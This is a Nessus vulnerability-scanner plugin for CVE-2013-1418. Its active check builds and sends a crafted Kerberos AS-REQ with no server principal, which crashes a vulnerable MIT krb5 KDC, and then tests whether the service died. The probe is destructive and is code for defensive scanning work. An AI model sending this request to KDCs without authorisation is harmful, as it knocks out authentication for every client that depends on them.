
Nessus plugin MIT_KERBEROS_CVE-2013-1418.NASL — Copyright (C) 2013-2018 Tenable Network Security, Inc.
History: Nov 18, 2013 - 12:00 a.m.

MIT Kerberos 5 setup_server_realm() Remote DoS

2013-11-18 00:00:00

EPSS score: 0.936 (High); EPSS percentile: 99.1%

The Kerberos service running on the remote host is affected by a remote denial of service (DoS) vulnerability. Attackers can exploit this issue to crash the affected KDC service, resulting in DoS conditions.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration. When Nessus loads the plugin this block only records
# metadata and exits; the active check further down never runs in this mode.
if (description)
{
  script_id(70941);
  script_version("1.5");
  script_cvs_date("Date: 2018/07/14  1:59:35");

  script_cve_id("CVE-2013-1418");
  script_bugtraq_id(63555);

  script_name(english:"MIT Kerberos 5 setup_server_realm() Remote DoS");
  # Honest summary: this plugin does not fingerprint a version, it actually
  # sends the crashing request and then checks whether the listener is gone.
  script_summary(english:"Tries to crash krb5kdc");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A single sign-on service is affected by a denial of service
vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The Kerberos service running on the remote host is affected by a remote
denial of service (DoS) vulnerability.  Attackers can exploit this issue
to crash the affected KDC service, resulting in DoS conditions."
  );
  # Upstream MIT krb5 ticket tracking the fix.
  script_set_attribute(attribute:"see_also", value:"http://krbdev.mit.edu/rt/Ticket/Display.html?id=7757");
  script_set_attribute(attribute:"solution", value:"Update the affected krb5 package.");
  # Network-reachable, no authentication, availability impact only (no C/I).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"patch_publication_date", value:"2013/11/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/11/18");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mit:kerberos:5");

  script_end_attributes();

  # Destructive: a positive result means the target KDC is now down, and
  # every client relying on it for tickets loses authentication until the
  # daemon is restarted. The engine skips ACT_DESTRUCTIVE_ATTACK plugins
  # while safe checks are enabled; only run this against a KDC you are
  # allowed to take offline.
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
  script_family(english:"General");

  # Relies on find_service.nasl to label the krbtgt service; falls back to
  # TCP/88 when no such label exists.
  script_dependencies("find_service.nasl");
  script_require_ports("Services/krbtgt", 88);

  exit(0);
}

include("audit.inc");
include("kerberos_func.inc");
include("global_settings.inc");
include("misc_func.inc");

# Active check. Uses the krbtgt port recorded by find_service.nasl (which
# appears to only recognise MIT Kerberos), falling back to TCP/88; bails out
# if the port is not open.
kdc_port = get_service(svc:'krbtgt', default:88, exit_on_fail:TRUE);
if (!get_port_state(kdc_port)) audit(AUDIT_PORT_CLOSED, kdc_port);

sock = open_sock_tcp(kdc_port);
if (!sock) audit(AUDIT_SOCK_FAIL, kdc_port, 'TCP');

# Client principal and realm are throwaway names derived from the plugin
# name; they only need to be well-formed. No pre-authentication data is sent.
client_realm = 'REALM_' + SCRIPT_NAME;
client_name  = 'principal_' + SCRIPT_NAME;
no_padata    = NULL;

# Build an AS-REQ (msg-type 10) that deliberately leaves out the server
# principal (service:NULL); that missing field is what the vulnerable
# setup_server_realm() path trips over.
body    = der_encode_kdc_req_body(principal:client_name, realm:client_realm, service:NULL);
kdc_req = der_encode_kdcreq(pvno:5, msg_type:0x0A, list:no_padata, req_body:body);
as_req  = der_encode(tag:0x6A, data:kdc_req);   # 0x6A = [APPLICATION 10] AS-REQ

# Kerberos over TCP prefixes each message with a 4-byte big-endian length
# whose high bit is reserved, hence the 0x7fffffff mask. This is the
# destructive step: a vulnerable KDC goes down on receipt.
framed = raw_dword(d:strlen(as_req) & 0x7fffffff, be:TRUE) + as_req;
send(socket:sock, data:framed);
close(sock);

# Give the daemon a moment to process the request (and die).
sleep(1);

# Verdict. A listener that is gone is reported; one that still accepts
# connections is reported as not vulnerable; a connect timeout is
# inconclusive and exits quietly. NOTE(review): the CVE text ties this
# crash to KDCs configured with multiple realms - confirm; if so, an
# unpatched single-realm KDC survives the probe and the "not vulnerable"
# verdict does not prove the package is patched. A supervisor that restarts
# the daemon within the 1 s wait can likewise mask a real crash.
kdc_dead = service_is_dead(port:kdc_port);
if (kdc_dead == 1)
  security_warning(port:kdc_port);
else if (kdc_dead == 0)
  audit(AUDIT_LISTEN_NOT_VULN, 'KDC', kdc_port);
else if (kdc_dead == -1)
  exit(0, 'An attempt to connect to remote TCP port ' + kdc_port +' timed out.');
Affected product — Vendor: mit; Product: kerberos; Version: 5; CPE: cpe:/a:mit:kerberos:5